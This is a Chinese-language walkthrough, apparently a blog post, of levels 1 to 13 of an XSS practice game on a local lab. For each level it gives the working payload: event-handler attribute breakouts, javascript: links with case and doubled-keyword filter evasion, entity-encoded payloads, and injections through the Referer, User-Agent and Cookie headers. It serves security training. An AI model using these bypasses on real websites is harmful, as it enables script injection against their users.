XSS小游戏【1-13关】

第一关

Payload:<script>alert(1)</script>

第二关

Payload:keyword=<script>alert(1)</script> 发现没有成功,F12发现需要闭合input 标签

再次输入payload:aaa"><svg οnlοad=alert(1)>

//当这个输入被插入到网页中时,浏览器会将其解析为HTML代码,并执行其中的JavaScript代码

第三关

Payload:<script>alert(1)</script>

Payload:' οnfοcus=javascript:alert('xss') ' 要点击搜索再次按下搜索框就会出现

第四关

payload:<script>alert(1)</script>

F12查看数据源码, 注入测试后,发现过滤了>和<

Payload:"οnclick="alert(111)

第五关

payload:"><a href='javascript:alert(1)'>aa</a>

最后点击那两个蓝色的aa,就会提示你过关

第六关

payload:"><a hReF='javascript:alert(1)'>aa</a>

第7关

Payload:"><a hhrefref='javascscriptript:alert(1)'>'aa'</a>

第八关

payload:&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41; 最后点击'友情链接'

第九关

payload:&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;//http://www.baidu.com

'添加友情链接->点击友情链接'

第十关

payload:?t_sort=" type="text" οnclick="alert(1)

第十一关(referer参数注入)

payload:referer:"type="text" οnclick="alert(1)

http://127.0.0.1/ljy22601239/xss/level11.php?keyword=good%20job!

第十二关(user-agent参数注入)

payload:User-Agent: "type="text" οnclick="alert(1)

第十三关(cookie参数绕过)

payload:Cookie: user="type="text" οnclick="javascript:alert(1)

保护cookie值,用到setcookie函数

相关推荐
Fly不安全6 小时前
HackTheBox靶机:Sightless;NodeJS模板注入漏洞,盲XSS跨站脚本攻击漏洞实战
网络·安全·web安全·web·xss·hackthebox·模板注入
泷羽Sec-pp6 小时前
XSS靶场通关详解
服务器·网络·xss
Koi慢热6 小时前
XSS (XSS)分类
前端·xss
莫名有雪6 小时前
BUUCTF_Web( XSS COURSE 1)xss
前端·xss
德迅云安全-小钱13 小时前
跨站脚本攻击(XSS)原理及防护方案
前端·网络·xss
dal118网工任子仪17 小时前
61,【1】BUUCTF WEB BUU XSS COURSE 11
前端·数据库·xss
H轨迹H1 天前
DVWA靶场XSS漏洞通关教程及源码审计
网络安全·渗透测试·xss·dvwa·web漏洞
doubt。1 天前
【BUUCTF】BUU XSS COURSE 11
笔记·学习·安全·web安全·网络安全·web·xss
小龙.nice2 天前
每日进步一点点(网安)
xss
黑客老陈4 天前
基于 Electron 应用的安全测试基础 — 提取和分析 .asar 文件
运维·服务器·前端·javascript·网络·electron·xss